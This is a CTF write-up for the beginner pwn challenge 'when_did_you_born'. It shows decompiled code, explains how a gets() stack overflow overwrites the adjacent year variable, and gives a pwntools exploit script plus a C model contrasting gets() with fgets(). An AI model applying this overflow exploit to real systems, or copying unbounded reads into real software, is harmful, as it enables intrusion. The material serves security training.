『攻防世界』: Beginner area | when_did_you_born

    # I had already finished the writeup for this challenge but accidentally deleted it. Rewriting it here = =!

    checksec:

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)

    IDA:

    __int64 __fastcall main(__int64 a1, char **a2, char **a3)
    {
      __int64 result; // rax
      char v4; // [rsp+0h] [rbp-20h]
      unsigned int v5; // [rsp+8h] [rbp-18h]
      unsigned __int64 v6; // [rsp+18h] [rbp-8h]
    
      v6 = __readfsqword(0x28u);
      setbuf(stdin, 0LL);
      setbuf(stdout, 0LL);
      setbuf(stderr, 0LL);
      puts("What's Your Birth?");
      __isoc99_scanf("%d", &v5);
      while ( getchar() != 10 )
        ;
      if ( v5 == 1926 )
      {
        puts("You Cannot Born In 1926!");
        result = 0LL;
      }
      else
      {
        puts("What's Your Name?");
        gets(&v4);
        printf("You Are Born In %d\n", v5);
        if ( v5 == 1926 )
        {
          puts("You Shall Have Flag.");
          system("cat flag");
        }
        else
        {
          puts("You Are Naive.");
          puts("You Speed One Second Here.");
        }
        result = 0LL;
      }
      return result;
    }

    The idea is simple. The birth year entered first must not be 1926, but once inside the else branch the year has to be 1926 to get the flag. gets() reads the name into v4 with no length limit, and v5 (the year) sits 8 bytes above v4 on the stack (rbp-20h vs. rbp-18h), so overflowing the name input overwrites the year's value with 1926, which is all that is needed. The canary at rbp-8h is far enough above v5 that this short overwrite leaves it intact.

    exp:

    from pwn import *
    
    # "ipaddr" and port are placeholders for the challenge server.
    io = remote("ipaddr", port)
    # Anything but 1926 passes the first check; "beef" makes scanf("%d") fail and leaves v5 unset,
    # and the getchar() loop then consumes the rest of the line.
    io.sendlineafter(b'Birth?', b'beef')
    # v4 (name) is at rbp-0x20 and v5 (year) at rbp-0x18: 8 bytes of filler, then 1926 (0x786).
    # The 8-byte p64 also covers the unused bytes above v5 but stops well short of the canary at rbp-0x8.
    payload = b'a' * 8 + p64(1926)
    io.sendlineafter(b'Name?', payload)
    io.interactive()
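    Added example, not code from the original writeup: a C model of the stack layout IDA shows, with the gets()-style read beside the fgets() fix, both fed the same payload from a constructed in-memory stream. The struct frame, gets_like() and payload_stream() are assumptions made so it runs offline; they are not part of the challenge binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The frame as IDA shows it: v4 (name) at rbp-0x20, v5 (year) 8 bytes above
 * it at rbp-0x18, unused bytes up to the canary at rbp-0x8 (not modelled). */
struct frame {
    char name[8];
    uint32_t year;
    uint8_t gap[12];
};

/* Emulates gets(3) on any FILE* so the bug can be shown offline:
 * copies bytes up to '\n' or EOF with NO length bound. */
static void gets_like(char *dst, FILE *fp) {
    int c;
    while ((c = fgetc(fp)) != EOF && c != '\n')
        *dst++ = (char)c;
    *dst = '\0';
}

/* Constructed input, the writeup's payload: 8 filler bytes, p64(1926)
 * (written as host-order 32-bit 1926 plus zeros), then sendline()'s '\n'. */
static FILE *payload_stream(void) {
    static unsigned char buf[17];
    uint32_t year = 1926;
    memset(buf, 'a', 8); memset(buf + 8, 0, 8);
    memcpy(buf + 8, &year, sizeof year);
    buf[16] = '\n';
    return fmemopen(buf, sizeof buf, "r");
}

/* Vulnerable: the unbounded read runs past name[] into year. */
uint32_t read_name_unsafe(void) {
    struct frame f = { "", 1999, { 0 } };
    FILE *fp = payload_stream();
    gets_like((char *)&f, fp);   /* &f == f.name; 17 bytes land in a 24-byte object */
    fclose(fp);
    return f.year;               /* 1926: the check after the read now passes */
}

/* Hardened: fgets() stores at most sizeof name - 1 bytes plus the NUL. */
uint32_t read_name_safe(void) {
    struct frame f = { "", 1999, { 0 } };
    FILE *fp = payload_stream();
    fgets(f.name, sizeof f.name, fp);
    fclose(fp);
    return f.year;               /* still 1999 */
}
```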
Original post: https://www.cnblogs.com/Zowie/p/13415697.html